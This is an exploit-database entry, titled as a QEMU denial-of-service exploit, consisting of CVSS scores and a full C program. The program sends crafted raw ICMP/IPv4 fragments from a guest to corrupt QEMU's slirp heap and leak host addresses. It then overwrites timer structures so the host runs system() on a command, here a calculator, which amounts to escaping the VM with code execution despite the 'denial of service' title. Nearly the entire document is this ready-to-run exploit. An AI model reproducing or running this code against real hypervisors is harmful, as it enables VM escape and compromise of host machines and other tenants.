Lucene search

K
zdtVishnudevtj1337DAY-ID-33176
HistoryAug 30, 2019 - 12:00 a.m.

QEMU - Denial of Service Exploit

2019-08-3000:00:00
vishnudevtj
0day.today
61
qemu
denial of service
exploit
structs
icmp
linux
socket
ethernet
vulnerability
dos

CVSS2

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

9

Confidence

High

EPSS

0.024

Percentile

90.1%

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <net/ethernet.h>
#include <arpa/inet.h>
#include <linux/icmp.h>
#include <linux/if_packet.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <time.h>


#define die(x) do {                             \
    perror(x);                                  \
    exit(EXIT_FAILURE);                         \
  }while(0);

// * * * * * * * * * * * * * * *  Constans * * * * * * * * * * * * * * * * * *

#define SRC_ADDR "10.0.2.15"
#define DST_ADDR "10.0.2.2"

#define INTERFACE "ens3"

#define ETH_HDRLEN 14         // Ethernet header length
#define IP4_HDRLEN 20         // IPv4 header length
#define ICMP_HDRLEN 8         // ICMP header length for echo request, excludes data
#define MIN_MTU 12000

// * * * * * * * * * * * * * * * QEMU Symbol offset * * * * * * * * * * * * * * * * * *

#define SYSTEM_PLT 0x029b290
#define QEMU_CLOCK 0x10e8200
#define QEMU_TIMER_NOTIFY_CB 0x2f4bff
#define MAIN_LOOP_TLG 0x10e81e0
#define CPU_UPDATE_STATE 0x488190

// Some place in bss which is not used to craft fake stucts
#define FAKE_STRUCT 0xf43360

// * * * * * * * * * * * * * * * QEMU Structs * * * * * * * * * * * * * * * * * *

struct mbuf {
	struct	mbuf *m_next;		/* Linked list of mbufs */
	struct	mbuf *m_prev;
	struct	mbuf *m_nextpkt;	/* Next packet in queue/record */
	struct	mbuf *m_prevpkt;	/* Flags aren't used in the output queue */
	int	m_flags;		/* Misc flags */

	int	m_size;			/* Size of mbuf, from m_dat or m_ext */
	struct	socket *m_so;

	char * m_data;			/* Current location of data */
	int	m_len;			/* Amount of data in this mbuf, from m_data */

	void *slirp;
	char resolution_requested;
	u_int64_t expiration_date;
	char   *m_ext;
	/* start of dynamic buffer area, must be last element */
	char  *  m_dat;
};


struct QEMUTimer {
    int64_t expire_time;        /* in nanoseconds */
    void *timer_list;
    void *cb;
    void *opaque;
    void *next;
    int scale;
};


struct QEMUTimerList {
    void * clock;
    char active_timers_lock[0x38];
    struct QEMUTimer *active_timers;
    struct QEMUTimerList *le_next;   /* next element */                      \
    struct QEMUTimerList **le_prev;  /* address of previous next element */  \
    void *notify_cb;
    void *notify_opaque;

    /* lightweight method to mark the end of timerlist's running */
    size_t timers_done_ev;
};



// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *

int raw_socket;
int recv_socket;
int spray_id;
int idx;
char mac[6];

void * code_leak;
void * heap_leak;

void *Malloc(size_t size) {
  void * ptr = calloc(size,1);
  if (!ptr) {
    die("malloc() failed to allocate");
  }
  return ptr;
}

unsigned short in_cksum(unsigned short *ptr,int nbytes) {

register long           sum;            /* assumes long == 32 bits */
    u_short oddbyte;
    register u_short answer; /* assumes u_short == 16 bits */

    /*
     * Our algorithm is simple, using a 32-bit accumulator (sum),
     * we add sequential 16-bit words to it, and at the end, fold back
     * all the carry bits from the top 16 bits into the lower 16 bits.
     */

    sum = 0;
    while (nbytes > 1) {
      sum += *ptr++;
      nbytes -= 2;
}

/* mop up an odd byte, if necessary */
if (nbytes == 1) {
oddbyte = 0;            /* make sure top half is zero */
*((u_char *) &oddbyte) = *(u_char *)ptr;   /* one byte only */
sum += oddbyte;
}

/*
 * Add back carry outs from top 16 bits to low 16 bits.
 */

sum  = (sum >> 16) + (sum & 0xffff);    /* add high-16 to low-16 */
sum += (sum >> 16);                     /* add carry */
answer = ~sum;          /* ones-complement, then truncate to 16 bits */
return(answer);
}

void hex_dump(char *desc, void *addr, int len) 
{
    int i;
    unsigned char buff[17];
    unsigned char *pc = (unsigned char*)addr;
    if (desc != NULL)
        printf ("%s:\n", desc);
    for (i = 0; i < len; i++) {
        if ((i % 16) == 0) {
            if (i != 0)
                printf("  %s\n", buff);
            printf("  %04x ", i);
        }
        printf(" %02x", pc[i]);
        if ((pc[i] < 0x20) || (pc[i] > 0x7e)) {
            buff[i % 16] = '.';
        } else {
            buff[i % 16] = pc[i];
        }
        buff[(i % 16) + 1] = '\0';
    }
    while ((i % 16) != 0) {
        printf("   ");
        i++;
    }
    printf("  %s\n", buff);
}

char * ethernet_header(char * eth_hdr){
  
    /* src MAC :  52:54:00:12:34:56 */
    memcpy(&eth_hdr[6],mac,6);

    // Next is ethernet type code (ETH_P_IP for IPv4).
    // http://www.iana.org/assignments/ethernet-numbers
    eth_hdr[12] = ETH_P_IP / 256;
    eth_hdr[13] = ETH_P_IP % 256;
    return eth_hdr;
}

void ip_header(struct  iphdr * ip ,u_int32_t src_addr,u_int32_t dst_addr,u_int16_t payload_len,
                         u_int8_t protocol,u_int16_t id,uint16_t frag_off){

  /* rfc791 */
  ip->ihl = IP4_HDRLEN / sizeof (uint32_t);
  ip->version = 4;
  ip->tos = 0x0;
  ip->tot_len = htons(IP4_HDRLEN + payload_len);
  ip->id = htons(id);
  ip->ttl = 64;
  ip->frag_off = htons(frag_off);
  ip->protocol = protocol;
  ip->saddr = src_addr;
  ip->daddr = dst_addr;
  ip->check = in_cksum((unsigned short *)ip,IP4_HDRLEN);
}

void icmp_header(struct icmphdr *icmp, char *data, size_t size) {

  /* rfc792 */
  icmp->type = ICMP_ECHO;
  icmp->code = 0;
  icmp->un.echo.id = htons(0);
  icmp->un.echo.sequence = htons(0);
  if (data) {
    char * payload = (char * )icmp+ ICMP_HDRLEN;
    memcpy(payload, data, size);
  }

  icmp->checksum = in_cksum((unsigned short *)icmp, ICMP_HDRLEN + size);

}

void send_pkt(char *frame, u_int32_t frame_length) {

  struct sockaddr_ll sock;
  sock.sll_family = AF_PACKET;
  sock.sll_ifindex = idx;
  sock.sll_halen = 6;
  memcpy (sock.sll_addr, mac, 6 * sizeof (uint8_t));
  
  if(sendto(raw_socket,frame,frame_length,0x0,(struct sockaddr *)&sock,
            sizeof(sock))<0)
    die("sendto()");
}

void send_ip4(uint32_t id,u_int32_t size,char * data,u_int16_t frag_off) {

  u_int32_t src_addr, dst_addr;
  src_addr = inet_addr(SRC_ADDR);
  dst_addr = inet_addr(DST_ADDR);

  char * pkt = Malloc(IP_MAXPACKET);
  struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);

  ethernet_header(pkt);
  u_int16_t payload_len = size;
  ip_header(ip,src_addr,dst_addr,payload_len,IPPROTO_ICMP,id,frag_off);

  if(data) {
    char * payload = (char *)pkt + ETH_HDRLEN + IP4_HDRLEN;
    memcpy(payload, data, payload_len);
  }
  
  u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + payload_len;
  send_pkt(pkt,frame_length);
  free(pkt);
}

void send_icmp(uint32_t id,u_int32_t size,char * data,u_int16_t frag_off) {

  char * pkt = Malloc(IP_MAXPACKET);
  struct icmphdr * icmp = (struct icmphdr * )(pkt);

  if(!data)
      data = Malloc(size);
  icmp_header(icmp,data,size);

  u_int32_t len =  ICMP_HDRLEN + size;
  send_ip4(id,len,pkt,frag_off);
  free(pkt);
 }

// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *

void initialize() {
   int sd;
   struct ifreq ifr;
   char interface[40];
   int mtu;

   srand(time(NULL));
   strcpy (interface, INTERFACE);

  // Submit request for a socket descriptor to look up interface.
  if ((sd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
    die("socket() failed to get socket descriptor for using ioctl()");
  }
    // Use ioctl() to get interface maximum transmission unit (MTU).
  memset (&ifr, 0, sizeof (ifr));
  strcpy (ifr.ifr_name, interface);
  if (ioctl (sd, SIOCGIFMTU, &ifr) < 0) {
    die("ioctl() failed to get MTU ");
  }
  mtu = ifr.ifr_mtu;
  printf ("MTU of interface %s : %i\n", interface, mtu);
  if (mtu < MIN_MTU) {
    printf("Run\n$ ip link set dev %s mtu 12000\n",interface);
    die("");
  }

  // Use ioctl() to look up interface name and get its MAC address.
  memset (&ifr, 0, sizeof (ifr));
  snprintf (ifr.ifr_name, sizeof (ifr.ifr_name), "%s", interface);
  if (ioctl (sd, SIOCGIFHWADDR, &ifr) < 0) {
    die("ioctl() failed to get source MAC address ");
  }
  memcpy (mac, ifr.ifr_hwaddr.sa_data, 6 * sizeof (uint8_t));
  printf ("MAC %s :", interface);
  for (int i=0; i<5; i++) {
    printf ("%02x:", mac[i]);
  }
  printf ("%02x\n", mac[5]);

  // Use ioctl() to look up interface index which we will use to
  // bind socket descriptor sd to specified interface with setsockopt() since
  // none of the other arguments of sendto() specify which interface to use.
  memset (&ifr, 0, sizeof (ifr));
  snprintf (ifr.ifr_name, sizeof (ifr.ifr_name), "%s", interface);
  if (ioctl (sd, SIOCGIFINDEX, &ifr) < 0) {
    die("ioctl() failed to find interface ");
  }

  close (sd);
  printf ("Index for interface %s : %i\n", interface, ifr.ifr_ifindex);
  idx = ifr.ifr_ifindex;
  
  if((raw_socket = socket(PF_PACKET, SOCK_RAW, htons (ETH_P_ALL)))==-1)
      die("socket() failed to obtain raw socket");


  /* Bind socket to interface index. */
  if (setsockopt (raw_socket, SOL_SOCKET, SO_BINDTODEVICE, &ifr, sizeof (ifr)) < 0) {
    die("setsockopt() failed to bind to interface ");
  }

  printf("Initialized socket discriptors\n");
}


void spray(uint32_t size, u_int32_t count) {
  printf("Spraying 0x%x x ICMP[0x%x]\n",count,size);
   int s;
   u_int16_t frag_off;
   char * data;

   for (int i = 0; i < count; i++) {
     send_icmp(spray_id + i,size, NULL, IP_MF);
   }
}

void arbitrary_write(void *addr, size_t addrlen, char *payload, size_t size,
                     size_t spray_count) {
  
    spray(0x8, spray_count);


    size_t id = spray_id + spray_count;
    // Target
    size_t target_id = id++;
    send_ip4(target_id, 0x8, NULL, IP_MF);

   
    // Padding
    send_ip4(id++, 0x8, NULL, IP_MF);
    send_ip4(id++, 0x8, NULL, IP_MF);

    // Piviot Point
    size_t hole_1 = id++;
    send_ip4(hole_1, 0x8, NULL, IP_MF);


    // Padding
    send_ip4(id++, 0xC30, NULL, IP_MF);

    // For creating hole
    size_t hole_2 = id++;
    send_ip4(hole_2, 0x8, NULL, IP_MF);

    // To  prevent consolidation
    send_ip4(id++, 0x8, NULL, IP_MF);

    // This should create the fist hole
    send_ip4(hole_1, 0x8, NULL, 0x1);

    // This should create the second hole
    send_ip4(hole_2, 0x8, NULL, 0x1);

    int m_data_off = -0x70;
    int m_len = m_data_off;
    addr = (void *)((size_t)addr + ((m_len * -1) - addrlen));
    if (addrlen != 0x8) {
      m_len -= (0x8 - addrlen);
    }

    size_t vuln_id = id++;

    char * pkt = Malloc(IP_MAXPACKET);
    memset(pkt,0x0,IP_MAXPACKET);
    struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    ethernet_header(pkt);

    u_int16_t pkt_len = 0xc90;
    ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,IP_MF);
    u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;

    // The mbuf of this packet will be placed in the second hole and
    // m_ext buff will be placed on the first hole, We will write wrt
    // to this.
    send_pkt(pkt,frame_length);

    memset(pkt,0x0,IP_MAXPACKET);
    ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    ethernet_header(pkt);
    pkt_len = 0x8;
    ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,0x192);
    frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;

    // Trigger the bug to change target's m_len
    send_pkt(pkt,frame_length);


    // Underflow and write, to change m_data
    char addr_buf[0x8] = {0};
    if (addrlen != 0x8) {
      memcpy(&addr_buf[(0x8-addrlen)],(char *)&addr,addrlen);
    } else {
      memcpy(addr_buf,(char *)&addr,8);
    }
    send_ip4(target_id, 0x8, addr_buf, 0x1|IP_MF);
    send_ip4(target_id, size, payload, 0x2);

    hex_dump("Writing Payload ", payload, size);
}


void recv_leaks(){
  /* Prepare recv sd */
  /* Submit request for a raw socket descriptor to receive packets. */
  int recvsd, fromlen, bytes, status;
  struct sockaddr from;
  char recv_ether_frame[IP_MAXPACKET];
  struct iphdr *recv_iphdr = (struct iphdr *)(recv_ether_frame + ETH_HDRLEN);
  struct icmphdr *recv_icmphdr =
      (struct icmphdr *)(recv_ether_frame + ETH_HDRLEN + IP4_HDRLEN);

  for (;;) {

    memset(recv_ether_frame, 0, IP_MAXPACKET * sizeof(uint8_t));
    memset(&from, 0, sizeof(from));
    fromlen = sizeof(from);
    if ((bytes = recvfrom(recv_socket, recv_ether_frame, IP_MAXPACKET, 0,
                          (struct sockaddr *)&from, (socklen_t *)&fromlen)) <
        0) {
      status = errno;
      // Deal with error conditions first.
      if (status == EAGAIN) { // EAGAIN = 11
        printf("Time out\n");
      } else if (status == EINTR) { // EINTR = 4
        continue; // Something weird happened, but let's keep listening.
      } else {
        perror("recvfrom() failed ");
        exit(EXIT_FAILURE);
      }
    } // End of error handling conditionals.

    // Check for an IP ethernet frame, carrying ICMP echo reply. If not, ignore
    // and keep listening.
    if ((((recv_ether_frame[12] << 8) + recv_ether_frame[13]) == ETH_P_IP) &&
        (recv_iphdr->protocol == IPPROTO_ICMP) &&
        (recv_icmphdr->type == ICMP_ECHOREPLY) && (recv_icmphdr->code == 0) &&
        (recv_icmphdr->checksum == 0xffff)) {
      hex_dump("Recieved ICMP Replay : ", recv_ether_frame, bytes);

      code_leak = (void *)(*((size_t *)&recv_ether_frame[0x40]) - CPU_UPDATE_STATE);
      size_t *ptr = (size_t *)(recv_ether_frame + 0x30);
      for (int i = 0; i < (bytes / 0x8); i++) {
        if ((ptr[i] & 0x7f0000000000) == 0x7f0000000000) {
          heap_leak = (void *)(ptr[i] & 0xffffff000000);
          break;
        }
      }

      printf("Host Code Leak : %p\n", code_leak);
      printf("Host Heap Leak : %p\n", heap_leak);
      break;
    }
  }
}

void leak() {
    u_int32_t src_addr, dst_addr;
    src_addr = inet_addr(SRC_ADDR);
    dst_addr = inet_addr(DST_ADDR);

    /* Crafting Fake ICMP Packet For Leak */
    char * pkt = Malloc(IP_MAXPACKET);
    struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    struct icmphdr * icmp = (struct icmphdr * )(pkt+ETH_HDRLEN+IP4_HDRLEN);
    ethernet_header(pkt);
    ip_header(ip,src_addr,dst_addr,ICMP_HDRLEN,IPPROTO_ICMP,0xbabe,IP_MF);

    ip->tot_len = ntohs(ip->tot_len) - IP4_HDRLEN;
    ip->id = ntohs(ip->id);
    ip->frag_off = htons(ip->frag_off);

    icmp_header(icmp,NULL,0x0);
    char * data = (char *)icmp + ICMP_HDRLEN + 8;
    size_t pkt_len = ETH_HDRLEN + IP4_HDRLEN + ICMP_HDRLEN;

    spray_id = rand() & 0xffff;
    arbitrary_write((void * )(0xb00-0x20),3,pkt,pkt_len+4,0x100);

    // This is same as the arbitrary write function
    spray_id = rand() & 0xffff;
    spray(0x8, 0x20);
    size_t id = spray_id + 0x20;

    size_t replay_id = id++;
    send_ip4(replay_id, 0x100, NULL, IP_MF);

    // Target
    size_t target_id = id++;
    send_ip4(target_id, 0x8, NULL, IP_MF);

   
    // Padding
    send_ip4(id++, 0x8, NULL, IP_MF);
    send_ip4(id++, 0x8, NULL, IP_MF);

    // Piviot Point
    size_t hole_1 = id++;
    send_ip4(hole_1, 0x8, NULL, IP_MF);


    // Padding
    send_ip4(id++, 0xC30, NULL, IP_MF);

    // For creating hole
    size_t hole_2 = id++;
    send_ip4(hole_2, 0x8, NULL, IP_MF);

    // Prevent Consolidation
    send_ip4(id++, 0x8, NULL, IP_MF);

    // This should create the fist hole
    send_ip4(hole_1, 0x8, NULL, 0x1);

    // This should create the second hole
    send_ip4(hole_2, 0x8, NULL, 0x1);

    // Trigger the bug to change target's m_len
    int m_data_off = -0xd50;
    int m_len = m_data_off;
    size_t * addr = (size_t * )(0xb00 - 0x20 + ETH_HDRLEN + 0xe +  6) ;
    size_t addrlen = 0x3;

    if (addrlen != 0x8) {
      m_len -= (0x8 - addrlen);
    }

    size_t vuln_id = id++;

    memset(pkt,0x0,IP_MAXPACKET);
    ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    ethernet_header(pkt);

    pkt_len = 0xc90;
    ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,IP_MF);
    u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
    send_pkt(pkt,frame_length);

    
    memset(pkt,0x0,IP_MAXPACKET);
    ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    ethernet_header(pkt);
    pkt_len = 0x8;
    ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,0x192);
    frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
    send_pkt(pkt,frame_length);


    // Underflow and write to change m_data
    char addr_buf[0x8] = {0};
    if (addrlen != 0x8) {
      memcpy(&addr_buf[(0x8-addrlen)],(char *)&addr,addrlen);
    } else {
      memcpy(addr_buf,(char *)&addr,8);
    }
    send_ip4(target_id, 0x8, addr_buf, 0x1);

  if ((recv_socket = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0)
      die("socket() failed to obtain a receive socket descriptor");
    send_ip4(replay_id, 0x8, NULL, 0x20);
    recv_leaks();


    char zero[0x28] = {0};
    spray_id = rand() & 0xffff;
    printf("Cleaning Heap\n");
    arbitrary_write(heap_leak + (0xb00 - 0x20),3,zero,sizeof(zero),0x20);
}


void pwn() {
  char payload[0x200] = {0};
  struct QEMUTimerList *tl = (struct QEMUTimerList *)payload;
  struct QEMUTimer *ts =
      (struct QEMUTimer *)(payload + sizeof(struct QEMUTimerList));

  char cmd[] = "/usr/bin/gnome-calculator";
  memcpy((void *)(payload + sizeof(struct QEMUTimerList )   \
                             +sizeof(struct QEMUTimer )),  \
                  (void *)cmd,sizeof(cmd));

  void * fake_timer_list = code_leak +  FAKE_STRUCT;
  void * fake_timer = fake_timer_list +  sizeof(struct QEMUTimerList);

  void *system = code_leak + SYSTEM_PLT;
  void *cmd_addr = fake_timer + sizeof(struct QEMUTimer);
  /* Fake Timer List */
  tl->clock = (void *)(code_leak + QEMU_CLOCK);
  *(size_t *)&tl->active_timers_lock[0x30] = 0x0000000100000000;
  tl->active_timers = fake_timer;
  tl->le_next = 0x0;
  tl->le_prev = 0x0;
  tl->notify_cb = code_leak + QEMU_TIMER_NOTIFY_CB;
  tl->notify_opaque = 0x0;
  tl->timers_done_ev = 0x0000000100000000;

  /*Fake Timer structure*/
  ts->timer_list = fake_timer_list;
  ts->cb = system;
  ts->opaque = cmd_addr;
  ts->scale = 1000000;
  ts->expire_time = -1;

  spray_id = rand() & 0xffff;
  size_t payload_size =
      sizeof(struct QEMUTimerList) + sizeof(struct QEMUTimerList) + sizeof(cmd);

  printf("Writing fake structure : %p\n",fake_timer_list);
  arbitrary_write(fake_timer_list,8,payload,payload_size,0x20);

  spray_id = rand() & 0xffff;
  void *  main_loop_tlg = code_leak + MAIN_LOOP_TLG;
  printf("Overwriting main_loop_tlg %p\n",main_loop_tlg);
  arbitrary_write(main_loop_tlg,8,(char *)&fake_timer_list,8,0x20);
}

int main() {
    initialize();
    leak();
    pwn();
    return 0;
}

CVSS2

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

9

Confidence

High

EPSS

0.024

Percentile

90.1%